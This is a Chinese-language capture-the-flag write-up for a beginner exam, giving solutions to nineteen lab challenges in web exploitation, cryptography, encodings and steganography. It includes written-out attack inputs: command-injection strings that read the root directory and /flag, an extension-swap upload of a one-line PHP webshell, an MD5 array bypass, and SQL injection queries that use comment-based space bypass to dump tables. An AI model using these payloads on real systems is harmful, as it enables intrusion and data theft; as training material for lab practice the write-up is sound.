目录
1.流量分析
使用Wireshark查看数据流,查找flag:
这里flag是找到了,可以通过下图这个追踪tcp流获取:
2.flag在哪?
这是我们的签到题:
没有提示,源代码也不给打开。 用bp抓包:
flag就在源代码里面,只是不能直接访问,bp抓包就出来了。
3.传个参吧
看源代码:
源代码是提示传一个hint参数,而且是GET形式:
传入hint后又提示要传入一个POST的参数:
Exam=Welcom_come_to_Yunxi_Exam
传入后成功获得flag。
4.Boom!
这题是爆破题,还有一个提示:
提示的源代码如下:
学号是12位的,现在已知了前10位了,用bp爆破后两位就可以:
爆破成功,输入管理员密码,得到flag:
5. easy-upload
一道文件上传题,上传一句换木马来进入后台获取flag,这里对.php做了屏蔽,改后缀为.jpg就行:
用bp抓包,把jpg改成php,这样一句话木马才能工作:
用蚁剑连接,在根目录下找到flag就行。
6.easy-rce
ping个127.0.0.1
有回显,查看一下目录:127.0.0.1|ls
flag不在里面,用127.0.0.1|ls /
查看根目录:
发现有flag,用cat指令发现被屏蔽了,那换一个more来查看:127.0.0.1|more /flag
或者下面这些也可以:
7.easy_php
php题,直接给出了代码
看见md5,是md5比较漏洞绕过,在比较中让两个结果都为0,0=0绕过:
payload:?0[]=2023f&1[]=2)
8.怎么?只会贝斯拿不下你?
base编码,base64,base32,base100等各种都有可能
看末尾4个=,不可能是base64,猜测是32,先base32解码
base32解密后就是base64了,解码得到flag
9.easy_rsa
求d,这里用到python辅助计算,先安装 gmpy2 库,将pqe的值代入脚本
24527367497845132449676798197906233313就是flag的内容。
10.简单的密码
这是社会主义核心价值观啊,一种编码方式,解码一下:
解码出来是百家姓编码,再解码即可:
11.music
mp3格式,音频隐写,使用工具MP3Stego ,在文件所在位置打开cmd:
先输入Decode.exe
再输入Decode -X music.mp3 -P nono
这样就是成功了,在原来的文件里面多出来一个 .txt
12.5+n的凯撒
密文是包含大小字母及符号的,推出为ASCII码偏移加密,找到一张ASCII码表对照来看:
afZ_对应flag,他们每位字符分别向后偏移了5,6,7,8位,即5+n位,理解了题目,现借助python脚本来对这个字符串解码:
13.easy_include
文件包含漏洞的题,写一句?file=flag.php 看看源代码:
找到flag。
14.徐江的嘲讽
文件解压时,有头部错误的提示:
flag.txt打开发现需要密码,是文件隐写,010打开可以直接看到内容:
15.今天你学习了吗?
图片隐写题, 查看图片属性,其实图片其实是不完整的:
找到图片的宽高,修改一下,让他显示完整,1024在010editor里面显示是400(16进制),把400改成800:
flag成功显示了出来。
16.想看我驴哥吗?
使用AZPR工具密码爆破,密码为6位数字:
密码是604604,解压文件:
记事本打开这个图片
这一串base64就是flag,用文本替换功能把中间的空格消除掉:
17.Life Story
虽然是rar后缀,但是其实是一个txt文件,直接用记事本就可以打开:
emoji形式,像是一种编码,通过百度了解到这是base100编码:
解码后是base32,base32解码:
最后再进行base64解码即可:flag{19cb2eeae5c953a32fa873e0682ed330}
18. easy_sql
本题是空格绕过的题,首先-1'/**/order/**/by/**/3#查询到列数为3。
其次-1'/**/union/**/select/**/1,2,3#爆出显示位:
然后获取当前数据库名-1'/**/union/**/select/**/database(),2,3#
然后子查询 :
-1'/**/union/**/select/**/group_concat(table_name),2,3/**/
from/**/
information_schema.tables/**/where/**/table_schema=database()#
得到了数据表bighacker之后,访问bighacker获取flag
-1'/**/union/**/select/**/group_concat(concat_ws("~",hack2,hack3)),2,3/**/from/**/bighacker#
19.NC
kali自带nc工具,nc 192.168.31.77 1337